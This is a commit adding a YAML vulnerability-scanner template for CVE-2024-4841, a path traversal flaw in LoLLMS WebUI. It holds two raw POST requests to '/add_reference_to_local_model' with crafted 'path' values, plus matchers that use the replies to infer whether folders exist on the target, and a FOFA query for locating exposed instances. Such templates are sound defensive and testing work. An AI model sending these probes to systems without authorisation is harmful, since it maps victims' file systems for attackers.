Merge pull request #11108 from Kazgangap/CVE-2024-4841

add CVE-2024-4841
2024-11-02 15:10:32 +05:30 · 2024-11-02 15:10:32 +05:30 · c62dd8f2ea
parent bbbe4732f2 e73e1a97f1
commit c62dd8f2ea
1 changed files with 62 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-4841.yaml
+++ b/http/cves/2024/CVE-2024-4841.yaml
@ -0,0 +1,62 @@
+id: CVE-2024-4841
+
+info:
+  name: LoLLMS WebUI - Subfolder Prediction via Path Traversal
+  author: s4e-io
+  severity: medium
+  description: |
+    A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.
+  impact: |
+    By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.
+  reference:
+    - https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4841
+  classification:
+    cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4
+    cve-id: CVE-2024-4841
+    cwe-id: CWE-29
+    epss-score: 0.00043
+    epss-percentile: 0.09834
+  metadata:
+    max-request: 1
+    fofa-query: "LoLLMS WebUI - Welcome"
+  tags: cve,cve2024,lollms-webui,traversal
+
+variables:
+  folder: "{{to_upper(rand_text_alpha(10))}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /add_reference_to_local_model HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"path":"\\Users"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "{\"status\":true}")'
+          - 'contains(content_type,"application/json")'
+          - 'status_code == 200'
+        condition: and
+
+  - raw:
+      - |
+        POST /add_reference_to_local_model HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"path":"\\{{folder}}"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")'
+          - 'contains(content_type,"application/json")'
+          - 'status_code == 200'
+        condition: and